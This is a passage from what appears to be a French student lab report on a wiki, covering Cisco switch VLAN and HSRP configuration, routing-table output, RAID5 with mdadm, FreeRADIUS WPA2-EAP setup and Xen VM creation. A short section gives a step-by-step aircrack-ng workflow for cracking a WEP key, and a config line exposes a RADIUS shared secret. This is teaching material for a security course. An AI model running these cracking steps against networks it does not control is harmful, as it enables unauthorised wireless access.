 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
